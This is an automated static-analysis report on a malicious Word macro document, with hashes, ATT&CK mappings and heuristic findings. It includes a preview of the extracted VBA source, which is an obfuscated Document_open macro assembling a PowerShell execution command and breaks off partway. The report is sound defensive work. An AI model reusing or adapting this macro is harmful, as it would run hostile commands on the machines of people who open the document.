Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a8a1e39f215f3b22…

MALICIOUS

Office (OLE)

319.8 KB Created: 2018-07-12 13:22:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: c621153c09943892ac5856dd855d48ff SHA-1: 73b5c44b4110aee0b8adf3349e244c3a43b42d7d SHA-256: a8a1e39f215f3b22e55d47a48e99e5af438224f789d91ab6a26c662658184e5b
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. The 'Document_open' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. No specific family could be identified.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45742 bytes
SHA-256: b8aeb309ae3a871621b12113f0b527752b58a7963d1afe40b5b1bb0bcff5d9ec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "PaSOnTflGh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   vSGUEQ = (zjsBH + lOzdXX + qsvlUu + YczwS) - QzXdY * GwYudt
   fubZws = (ECXUA + NdVmu + FdmqVE + QASwRs) - CYdBXB * hMwAJ
   LjiFfF = (WCuANW + jNhUh + ASiXL + qjsfXA) - dWutm * JbDUP
   UJaYM = 85690 - Lqwuf - TSLfw / isncLC - 26715 / rYDjZo - quuLfz * zIGUNO * ndrOc + XhjOV
   UmmQU = 81738 - dYQTSw - viWrpz / EvLRwi - 35989 / Nfphj - KWpzX * YOMXwj * cDKXj + lQrbzY
   JYQppM = (iWfOqi + BmfZvC + zMatv + GKEUjs) - AIzCOs * VFoXMW
QjVsmVQFFBJ = Application.Run("pDzlSCUsFGsYB", "" + UDHiJjPsEFUAcU + FbRHpAT + MFiEcwjRSP + qHVhqnwbn + UGAFIoNO + DEwvNKGHYNn + pMWsfVOD + ckWZviK + ObMmSjhMU + kuYlSq + zQbVZSZY + ofQrjKc + jVwfL + sDTTUMjpq + ISCuUVz + oWnKKszB + KlikMckIhs + EpinUPPqFD)
   hwCTu = 81484 - LOCDbt - Tnruc / OfjaIn - 58133 / waPHd - DOZQN * SHFBlH * JvbwKa + vCRcKH
End Sub


Attribute VB_Name = "OnnwwZIFN"
Function MFiEcwjRSP()
On Error Resume Next
mAUHSU = wMRrd * svzDz * 69289 / iiqalh + 63885 * oVWzwJ - slzaDh * oUmukQ / (2474 / ffDVO)
skVOVFQ = "" + VlnaKrvuiQKDN + jRzuVoqwQs + "poW" + qtdudisdoQGVw + QTGwpbIXEPKnE + "ER" + WiYBEABWjUVai + dzvvZcKu + "shE" + hWYiTvnzA + wuVsPzZdTA + "Ll " + ulMrJFLM + nWdcrNZhchX + " " + Chr(34) + " &" + CaCKfkQcNHPi + DdsojlT + "( "
ibKLj = nkmmtO * niRUiH + 4054 * mNzhz + (7261 / BADJwj * NztwB + OGVwAu * (opjjCi * vNMdld / jlikR * VVUaf))
   OmGLEm = sjIEK * GujcW + 511 * POzwHW + (7657 / tqANvc * YZYMpp + fWowm * (zIEOT * iApHEi / nztIqO * SWHDKK))
mBIFPzuP = "" + jsAjCYl + XGOuWAkPM + "$SH" + fUnMjhJTUIAw + PVLwjFbXTLdD + "Elli" + UjLSiQULEozUOS + WKhIGiZT + "d[1]" + KIAcifPKw + hNPRDQXwOqIfKo + Chr(43) + "$s" + KspKspQGMK + SFEUGMp + "he"
TpbIX = (50375 / EjUoqI / 776 * LfHwAI / (JajnGq / DsotG))
   hSjRIF = (41195 / zbYIz / 54849 * pCVuif / (YkTwq / bzwBOK))
   qCOBU = (29473 / BcqnPJ / 9868 * IbEsw / (FsoSj / moZzz))
KmCccXa = "" + isDQlaHPwql + mYMDwjt + "Ll"
bpbctF = (2810 / bnPvWl / 4098 * cbdCI / (XmGhh / AOkquB))
   wobPG = (36292 / lzdSaL / 83497 * CDfjJR / (VLXamM / YAUuw))
   KOowzf = (42997 / pwhOXc / 81761 * uaQUV / (FXZNY / LOzSij))
wNJdbTBHFW = "" + NwpVmod + PIZhnOVh + "Id" + SPsfjkhZ + jOjBBpjqofArzQ + "[1" + nVklzMJzVlV + kEPBQaAZ + "3]" + Chr(43) + "'"
UUBnu = (37525 / vGnsaK / 33268 * umsPi / (wpjZk / lJwhWB))
   zEwkzZ = (44884 / PiJfQ / 67044 * RXaIu / (iUOKj / mIGVZ))
   wfisHK = (51664 / bUCzM / 77705 * wTFmfQ / (TjDbk / hqKEPp))
SaoiBS = "" + qnHSEoYZ + FTCtjKwtp + "x')" + jkaNRlRJNk + bZdQHDFzFWw + "(\" + Chr(34) + GsbwYfkfn + hEnDHPk + "$(Se" + qbTCtpq + OMmUwLsp + "t-i" + FTznTbiDPBqqm + ZiZZCjp + "tEM " + YtQMGcLRCu + snAbLlajSYaS + " 'VA" + jSQLFPTcPZ + wnqZoruYjr + "RIA" + rzPQCATzwhwsBq + MQYaQoom + "BLe:" + kjYrsptSUIADZP + ZPrwYzCkL + "ofs" + wjCIcXJPk + oGwiWjI + "' " + IUDPZvuVnjojd + lSzYfQzVoVakzp + "''"
bBYKd = (56317 / jhdncD / 71073 * LkDwE / (kibJwP / wKvfMK))
RBhzSlt = "" + MRIfPqC + SDzOzwsVoq + " )\" + Chr(34) + AfNtkWhIQtYtGY + ZRtcwmjMwkKzm + " " + Chr(43) + " [" + VHILmumfUU + YiEIbKEw + "st" + uwNwBwAMiVZXCl + ztnmZIij + "Ri" + scjoiuwYNKzn + iIlzhBbSJOKLJ + "nG"
MFiEcwjRSP = "" + mThqTDYctn + iYoPLzzHRW + skVOVFQ + GFaSUiWlNBaqPz + GfsMDbztVzzL + mBIFPzuP + FPojjNdFIPQ + dzzzOZLB + KmCccXa + SviIjzUfLZk + BjNMIAWd + wNJdbTBHFW + QUwXAklA + mVoFFzInkE + SaoiBS + hmwSBNCBPAW + nkZUuaZIb + RBhzSlt
   FrKhHf = (86927 / BawnKC / 52678 * YnjoRq / (IPDNzU / vKGqRF))
   sIHLri = (86927 / romJbh / 68349 * zaDlw / (qRNjT / duTGOQ))
End Function
Function qHVhqnwbn()
On Error Resume Next
TKPPmk = (60792 / aSliaj / 73397 * PuBRDR / (FUfnjU / VSBJNi))
mYAbjCnsZsE = "" + XkZmijwU + PCLOFaCOKv + "]( (" + wKqzSjRWIYpiih + RVVLMMEiKDw + "36," + PsfFalOw + SCEMrNdjX + "85" + zoZukmFHnP + MsjJdEwPhjED + ", " + ANUjTYnm + FKpzJou + "76,7" + UsTKDAfbfqNj + dlsnGvLuZacD 
... (truncated)